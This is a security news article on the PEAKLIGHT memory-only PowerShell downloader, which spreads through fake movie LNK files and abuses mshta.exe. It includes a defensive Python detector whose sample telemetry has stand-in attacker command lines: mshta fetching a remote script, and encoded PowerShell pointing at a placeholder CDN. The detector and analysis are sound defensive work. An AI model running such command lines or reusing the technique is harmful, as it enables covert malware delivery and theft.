Cybersecurity experts have identified a new memory-only malware dropper, used in attacks on Windows users through malicious movie downloads, that delivers a PowerShell downloader called PEAKLIGHT.
This newly discovered dropper functions as a stealthy vehicle, enabling the launch of various harmful software, such as information stealers and other types of malware loaders. The dropper is designed to operate entirely in memory, decrypting and executing a PowerShell-based downloader that cybersecurity reports have named PEAKLIGHT.
The PEAKLIGHT downloader is a critical component in distributing multiple malware strains, including Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are offered under the malware-as-a-service (MaaS) model.
The attack typically begins with a Windows shortcut (LNK) file that users unknowingly download while searching for movies online. These LNK files are often embedded within ZIP archives masquerading as pirated movies.
When opened, the LNK file connects to a content delivery network (CDN) that hosts an obfuscated, memory-only JavaScript dropper. This dropper, in turn, runs the PEAKLIGHT PowerShell script on the victim’s system, initiating contact with a command-and-control (C2) server to download further malicious payloads.
Researchers have found several versions of these LNK files, some of which use asterisks (*) as wildcards in the target path to trigger the legitimate Windows binary mshta.exe, which is then abused to run malicious code quietly retrieved from a remote server.
Additionally, these droppers have been identified embedding PowerShell payloads encoded in hex and Base64, which are subsequently unpacked to execute PEAKLIGHT. This downloader not only installs further malware but also downloads legitimate-looking movie trailers to maintain its disguise.
According to researchers, PEAKLIGHT is an intricately obfuscated PowerShell-based downloader that operates through a multi-stage execution chain. It specifically searches for ZIP archives in predefined file paths. If such archives are not found, it retrieves them from a CDN and saves them to the user’s system, further propagating the infection.
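The chain described above exposes three points a defender can watch in process-creation telemetry: mshta.exe launched through a wildcard-masked path or with a remote URL, PowerShell spawned by mshta.exe, and an encoded command that unpacks to a hex-packed blob. The following Python is an added example, not code from the report or from the researchers; the sample events, the .invalid domain and the hex blob are constructed placeholders.

```python
import base64
import re

# PowerShell's -EncodedCommand argument (base64 of a UTF-16LE script), a long run of hex pairs, a remote URL.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
HEX_BLOB = re.compile(r"(?:[0-9a-f]{2}){32,}", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or not decodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    """Flag (parent, image, command_line) process events; returns a list of (index, rule) pairs."""
    findings = []
    for i, (parent, image, cmdline) in enumerate(events):
        image = image.lower()
        if image == "mshta.exe":
            if "*" in cmdline:  # wildcard-masked path, as in the LNK variants described above
                findings.append((i, "mshta launched via wildcard-masked path"))
            if REMOTE_URL.search(cmdline):
                findings.append((i, "mshta fetching remote script"))
        elif image in ("powershell.exe", "pwsh.exe"):
            if parent.lower() == "mshta.exe":
                findings.append((i, "powershell spawned by mshta"))
            script = decode_encoded_command(cmdline)
            if script is not None:
                findings.append((i, "powershell encoded command"))
                if HEX_BLOB.search(script):
                    findings.append((i, "hex-encoded blob inside decoded script"))
    return findings

# Constructed sample telemetry (not from a real incident); the hex blob stands in for a hex-packed stage.
SAMPLE_HEX = ("constructed-sample-blob" * 3).encode().hex()
SAMPLE_SCRIPT = f"$h='{SAMPLE_HEX}'; $u='https://cdn.example.invalid/peaklight.ps1'"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe", r"C:\Wind*\Sys*\msh*.exe https://cdn.example.invalid/drop.js"),
    ("mshta.exe", "powershell.exe", f"powershell.exe -w hidden -enc {SAMPLE_ENC}"),
    ("explorer.exe", "notepad.exe", r"C:\Windows\System32\notepad.exe readme.txt"),
    ("explorer.exe", "mshta.exe", r"C:\Windows\System32\mshta.exe C:\Vendor\help.hta"),
]
```

Running `analyze(SAMPLE_EVENTS)` flags only the first two events; the legitimate local mshta.exe launch in the last event produces no finding.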
This method of distributing malware via fake movie downloads is not new. In a similar case earlier this year, a report detailed how attackers deployed Hijack Loader following attempts to download video files from illicit movie sites. A researcher noted that the dropper code used in both cases appeared identical, suggesting they might originate from the same threat actor.
Moreover, this disclosure coincides with another recent finding by cybersecurity experts, who identified a malvertising campaign using fraudulent Google Search ads for popular platforms like Slack. These ads direct users to deceptive websites, where they inadvertently download malicious installers leading to the deployment of remote access trojans like SectopRAT.
To prevent falling victim to such attacks, users should exercise caution when downloading files from untrusted sources, especially pirated content. It is crucial to use reputable antivirus software, regularly update operating systems and applications, and enable multi-layered security measures.
Always verify the authenticity of downloads, avoid clicking on suspicious links, and stay informed about the latest cybersecurity threats.